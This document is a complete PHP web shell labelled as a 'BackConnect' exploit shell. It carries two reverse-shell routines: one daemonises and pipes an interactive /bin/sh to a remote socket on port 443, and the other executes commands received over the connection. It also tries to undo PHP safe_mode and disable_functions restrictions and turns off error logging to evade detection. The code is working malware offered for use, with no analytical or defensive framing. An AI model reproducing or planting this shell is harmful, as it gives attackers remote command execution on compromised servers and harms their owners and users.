PhpBc1.php Exploit Sh3LL BackConnect Code

1. <?
2. @ini_restore("safe_mode");
3. @ini_restore("open_basedir");
4. @ini_restore("safe_mode_include_dir");
5. @ini_restore("safe_mode_exec_dir");
6. @ini_restore("disable_functions");
7. @ini_restore("allow_url_fopen");
8.  
9. @ini_set('error_log',NULL);
10. @ini_set('log_errors',0);
11. ?>
12. <?
13. echo ini_get("safe_mode");
14. echo ini_get("open_basedir");
15. ini_restore("safe_mode");
16. ini_restore("open_basedir");
17. echo ini_get("safe_mode");
18. echo ini_get("open_basedir");
19. ?>
20. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
21. <HTML>
22. <HEAD>
23. <meta http-equiv=Content-Type content="text/html; charset=windows-1254">
24. </HEAD>
25. <BODY>
26. <CENTER>
27. <?php
28. $uname = php_uname();
29. echo "Uname -a :$uname";
30. ?>
31. <br><br>
32. <a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
33. &nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
34. <?php
35. function printit ($string) {
36. if (!$daemon) {
37. print "$string\n";
38. }
39. }
40. $bc = $_GET["BackConnect"];
41. switch($bc){
42. case "PHP_1":
43.  
44. set_time_limit (0);
45. $VERSION = "1.0";
46. $ip = $_SERVER["REMOTE_ADDR"];
47. $port = 443;
48. $chunk_size = 1400;
49. $write_a = null;
50. $error_a = null;
51. $shell = 'uname -a; w; id; /bin/sh -i';
52. $daemon = 0;
53. $debug = 0;
54. if (function_exists('pcntl_fork')) {
55.  
56. $pid = pcntl_fork();
57.  
58. if ($pid == -1) {
59. printit("ERROR: Can't fork");
60. exit(1);
61. }
62.  
63. if ($pid) {
64. exit(0); // Parent exits
65. }
66. if (posix_setsid() == -1) {
67. printit("Error: Can't setsid()");
68. exit(1);
69. }
70.  
71. $daemon = 1;
72. } else {
73. print("WARNING: Failed to daemonise. This is quite common and not fatal.");
74. }
75.  
76. // Change to a safe directory
77. chdir("/");
78.  
79. // Remove any umask we inherited
80. umask(0);
81.  
82. //
83. // Do the reverse shell...
84. //
85.  
86. // Open reverse connection
87. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
88. if (!$sock) {
89. printit("$errstr ($errno)");
90. exit(1);
91. }
92.  
93. // Spawn shell process
94. $descriptorspec = array(
95. 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
96. 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
97. 2 => array("pipe", "w") // stderr is a pipe that the child will write to
98. );
99.  
100. $process = proc_open($shell, $descriptorspec, $pipes);
101.  
102. if (!is_resource($process)) {
103. printit("ERROR: Can't spawn shell");
104. exit(1);
105. }
106.  
107. // Set everything to non-blocking
108. // Reason: Occsionally reads will block, even though stream_select tells us they won't
109. stream_set_blocking($pipes[0], 0);
110. stream_set_blocking($pipes[1], 0);
111. stream_set_blocking($pipes[2], 0);
112. stream_set_blocking($sock, 0);
113.  
114. printit("Successfully opened reverse shell to $ip:$port");
115.  
116. while (1) {
117. // Check for end of TCP connection
118. if (feof($sock)) {
119. printit("ERROR: Shell connection terminated");
120. break;
121. }
122.  
123. // Check for end of STDOUT
124. if (feof($pipes[1])) {
125. printit("ERROR: Shell process terminated");
126. break;
127. }
128.  
129. // Wait until a command is end down $sock, or some
130. // command output is available on STDOUT or STDERR
131. $read_a = array($sock, $pipes[1], $pipes[2]);
132. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
133.  
134. // If we can read from the TCP socket, send
135. // data to process's STDIN
136. if (in_array($sock, $read_a)) {
137. if ($debug) printit("SOCK READ");
138. $input = fread($sock, $chunk_size);
139. if ($debug) printit("SOCK: $input");
140. fwrite($pipes[0], $input);
141. }
142.  
143. // If we can read from the process's STDOUT
144. // send data down tcp connection
145. if (in_array($pipes[1], $read_a)) {
146. if ($debug) printit("STDOUT READ");
147. $input = fread($pipes[1], $chunk_size);
148. if ($debug) printit("STDOUT: $input");
149. fwrite($sock, $input);
150. }
151.  
152. // If we can read from the process's STDERR
153. // send data down tcp connection
154. if (in_array($pipes[2], $read_a)) {
155. if ($debug) printit("STDERR READ");
156. $input = fread($pipes[2], $chunk_size);
157. if ($debug) printit("STDERR: $input");
158. fwrite($sock, $input);
159. }
160. }
161.  
162. fclose($sock);
163. fclose($pipes[0]);
164. fclose($pipes[1]);
165. fclose($pipes[2]);
166. proc_close($process);
167.  
168. // Like print, but does nothing if we've daemonised ourself
169. // (I can't figure out how to redirect STDOUT like a proper daemon)
170. break;
171. case "PHP_2":
172. $ipim=$_SERVER["REMOTE_ADDR"];
173. $portum="443";
174. if ($ipim <> "")
175. {
176. $mucx=fsockopen($ipim , $portum , $errno, $errstr );
177. if (!$mucx){
178. $result = "Error: didnt connect !!!";
179. }
180. else {
181.  
182. $zamazing0="\n";
183. fputs ($mucx ,"\nwelcome KingSkrupellos\n\n");
184. fputs($mucx , system("uname -a") .$zamazing0 );
185. fputs($mucx , system("pwd") .$zamazing0 );
186. fputs($mucx , system("id") .$zamazing0.$zamazing0 );
187. while(!feof($mucx)){
188. fputs ($mucx);
189. $one="[$";
190. $two="]";
191. $result= fgets ($mucx, 8192);
192. $message=`$result`;
193. fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
194. }
195. fclose ($mucx);
196. }
197. }
198.  
199. break;
200.  
201. }
202. ?>
203. </CENTER>
204. </BODY>
205. </HTML>